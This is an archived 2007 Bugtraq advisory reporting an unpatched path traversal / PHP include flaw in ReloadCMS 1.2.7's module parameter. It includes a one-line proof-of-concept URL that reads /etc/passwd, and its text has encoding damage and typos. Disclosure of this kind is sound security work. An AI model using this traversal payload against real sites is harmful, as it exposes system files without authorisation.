[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

ReloadCMS Vulnerable

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ReloadCMS Vulnerable
From: sekuru@xxxxxxxx
Date: 20 Oct 2007 14:27:20 -0000

    New Advisory:
    ReloadCMS
    http://reloadcms.com

    ???????Summary?????-
    Software: ReloadCMS
    Sowtware?s Web Site: http://reloadcms.com/main/
    Versions: 1.2.7
    Critical Level: Moderate
    Type: Multiple Vulnerabilities
    Class: Remote
    Status: Unpatched
    PoC/Exploit: Available
    Solution: Not Available
    Discovered by: http://reloadcms.com

    Php include bug

    ??????Description?????
    vulnerable mosule system.php, parameter GET['module'] is not properly 
filtered

    ?????PoC/Exploit???????-
    http://site.url/index.php?module=../../../../etc/passwd

    ?????Solution???????
    No Patch available.

    ?????Credit????????
    Discovered by: http://reloadcms.com

Prev by Date: Simple Machines Forum multiple sql injection flaws with exploit code.
Next by Date: [ GLSA 200710-21 ] TikiWiki: Arbitrary command execution
Previous by thread: Simple Machines Forum multiple sql injection flaws with exploit code.
Next by thread: [ GLSA 200710-21 ] TikiWiki: Arbitrary command execution
Index(es):
- Date
- Thread